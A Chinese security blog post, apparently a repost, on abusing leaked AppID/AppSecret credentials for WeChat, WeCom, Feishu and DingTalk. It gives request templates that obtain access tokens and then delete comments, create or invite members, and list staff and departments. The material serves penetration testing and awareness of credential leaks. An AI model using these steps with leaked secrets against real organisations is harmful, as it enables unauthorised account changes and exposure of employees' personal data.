文章总结: 该文档详细介绍了微信小程序、公众号、企业微信、飞书和钉钉等平台中AppID与AppSecret泄露后的利用方法,包括获取AccessToken、调用API接口(如获取服务器IP、管理评论、创建/读取成员、获取部门信息等)的具体步骤与请求示例,揭示了凭证泄露可能导致未授权访问和权限滥用的安全风险。 综合评分: 85 文章分类: 渗透测试,WEB安全,移动安全,漏洞分析,实战经验
appId和appSecret利用方法
小白鱼来了 小白鱼来了
Joker One Security
2026年2月11日 21:18 新加坡
文章首发于https://www.freebuf.com/articles/web/469130.html
微信小程序及公众号
参考链接:
https://developers.weixin.qq.com/doc/subscription/guide/dev/api/
获取accesstoken
https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=APPID&secret=APPSECRET
在获取accesstoken后可利用其他接口获取微信服务信息
获取微信API服务器IP
https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ACCESS_TOKEN
获取微信推送服务器IP
https://api.weixin.qq.com/cgi-bin/getcallbackip?access_token=ACCESS_TOKEN
操作评论
- 删除评论
POST /cgi-bin/comment/delete?access_token=ACCESS_TOKEN HTTP/1.1Host: api.weixin.qq.comContent-Type: application/jsonContent-Length: 80
{ "msg_data_id": MSG_DATA_ID, "index": 0, "user_comment_id": USER_COMMENT_ID}
- 回复评论
POST /cgi-bin/comment/reply/add?access_token=ACCESS_TOKEN HTTP/1.1Host: api.weixin.qq.comContent-Type: application/jsonContent-Length: 80
{ "msg_data_id" : MSG_DATA_ID, "index": 0, "user_comment_id": COMMENT_ID, "content": "内容"}
- 删除回复
POST /cgi-bin/comment/reply/delete?access_token=ACCESS_TOKEN HTTP/1.1Host: api.weixin.qq.comContent-Type: application/jsonContent-Length: 80
{ "msg_data_id" : MSG_DATA_ID, "index": 0, "user_comment_id": COMMENT_ID}
企业微信
参考链接:
https://developer.work.weixin.qq.com/document/path/91039
获取accesstoken
https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
获取企业微信接口IP段
https://qyapi.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ACCESS_TOKEN
获取企业微信回调IP段
https://qyapi.weixin.qq.com/cgi-bin/getcallbackip?access_token=ACCESS_TOKEN
创建成员
POST /cgi-bin/user/create?access_token=ACCESS_TOKEN HTTP/1.1Host: qyapi.weixin.qq.comContent-Type: application/jsonContent-Length: 320
{"userid": "zhangsan","name": "张三","mobile": "+86 13800000000","department": [1],"position": "产品经理","gender": "1","email": "[email protected]","enable": 1,"main_department": 1,"to_invite": true,"external_position": "高级产品经理"}
读取成员
https://qyapi.weixin.qq.com/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID
获取部门成员
https://qyapi.weixin.qq.com/cgi-bin/user/simplelist?access_token=ACCESS_TOKEN&department_id=DEPARTMENT_ID
获取部门成员详情
https://qyapi.weixin.qq.com/cgi-bin/user/list?access_token=ACCESS_TOKEN&department_id=DEPARTMENT_ID
邀请成员
POST /cgi-bin/batch/invite?access_token=ACCESS_TOKEN HTTP/1.1Host: qyapi.weixin.qq.comContent-Type: application/jsonContent-Length: 108
{ "user": ["UserID1", "UserID2", "UserID3"], "party": [1, 2, 3], "tag": [101, 102, 103]}
获取加入企业二维码
https://qyapi.weixin.qq.com/cgi-bin/corp/get_join_qrcode?access_token=ACCESS_TOKEN&size_type=SIZE_TYPE
获取成员ID列表
POST /cgi-bin/user/list_id?access_token=ACCESS_TOKEN HTTP/1.1Host: qyapi.weixin.qq.comContent-Type: application/jsonContent-Length: 108
{"cursor": "xxxxxxx","limit": 10000}
飞书
参考链接:
https://open.feishu.cn/document/server-docs/api-call-guide/calling-process/get-access-token
获取accesstoken
POST https://open.feishu.cn/open-apis/auth/v3/tenant_access_token/internal HTTP/1.1Host: open.feishu.cnContent-Type: application/json; charset=utf-8Content-Length: 88
{ "app_id": "APP_ID", "app_secret": "APP_SECRET"}
获取用户信息
GET /open-apis/contact/v3/users/7be5fg9a?department_id_type=open_department_id&user_id_type=open_id HTTP/1.1Host: open.feishu.cnAuthorization: accesstoken
钉钉
参考文档:
https://open.dingtalk.com/document/development/obtain-user-token
https://developer.aliyun.com/ask/532363
获取accesstoken
https://oapi.dingtalk.com/gettoken?appkey=your_app_key&appsecret=your_app_secret&grant_type=client_credential
企业内部应用accesstoken
POST /v1.0/oauth2/accessToken HTTP/1.1Host:api.dingtalk.comContent-Type:application/json
{ "appKey" : "dingeqqpkv3xxxxxx", "appSecret" : "GT-lsu-taDAxxxsTsxxxx"}
获取微应用后台免登的accessToken
POST /v1.0/oauth2/ssoAccessToken HTTP/1.1Host:api.dingtalk.comContent-Type:application/json
{ "corpid" : "String", "ssoSecret" : "String"}
获取部门列表
POST /topapi/v2/department/listsub?access_token=ACCESS_TOKEN HTTP/1.1Host: oapi.dingtalk.comContent-Type: application/json; charset=utf-8Content-Length: 42
{ "dept_id": 1, "language": "zh_CN"}
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Joker One Security 小白鱼来了 小白鱼来了《appId和appSecret利用方法》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论